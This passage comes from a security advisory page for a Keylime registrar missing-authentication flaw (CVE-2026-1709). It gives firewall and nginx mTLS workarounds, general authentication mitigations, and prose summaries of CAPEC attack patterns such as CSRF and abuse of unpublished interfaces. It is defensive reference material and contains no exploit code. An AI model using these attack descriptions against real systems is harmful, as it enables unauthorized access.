\u003ctenant_ip\u003e -j ACCEPT\niptables -A INPUT -p tcp --dport 8891 -j DROP\n```\n\n#### 2. Reverse proxy with mTLS enforcement\n\nDeploy a reverse proxy (nginx, HAProxy) in front of the registrar that enforces client certificate authentication:\n\n##### Example nginx configuration\n```\nserver {\n    listen 8891 ssl;\n    ssl_certificate /path/to/server.crt;\n    ssl_certificate_key /path/to/server.key;\n    ssl_client_certificate /path/to/ca.crt;\n    ssl_verify_client on;  # Enforce client certificates\n\n    location / {\n        proxy_pass https://localhost:8892;  # Internal registrar port\n    }\n}\n```",
  "id": "GHSA-4jqp-9qjv-57m2",
  "modified": "2026-06-06T00:37:09Z",
  "published": "2026-02-06T22:34:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keylime/keylime/security/advisories/GHSA-4jqp-9qjv-57m2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1709"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:2224"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:2225"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:2298"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-1709"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435514"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keylime/keylime"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/keylime/PYSEC-2026-74.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keylime Missing Authentication for Critical Function and Improper Authentication"
}

Mitigation
Architecture and Design
  • Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability.
  • Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected, including those channels that are assumed to be accessible only by authorized parties. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port.
  • In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout.
Mitigation MIT-15
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation
Architecture and Design
  • Where possible, avoid implementing custom, "grow-your-own" authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These capabilities may avoid common weaknesses that are unique to authentication; support automatic auditing and tracking; and make it easier to provide a clear separation between authentication tasks and authorization tasks.
  • In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly.
Mitigation MIT-4.5
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45].
Mitigation
Implementation System Configuration Operation

When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to require strong authentication for users who should be allowed to access the data [REF-1297] [REF-1298] [REF-1302].

CAPEC-12: Choosing Message Identifier

This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.

CAPEC-166: Force the System to Reset Values

An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.

CAPEC-216: Communication Channel Manipulation

An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.

CAPEC-36: Using Unpublished Interfaces or Functionality

An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.

CAPEC-62: Cross Site Request Forgery

An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.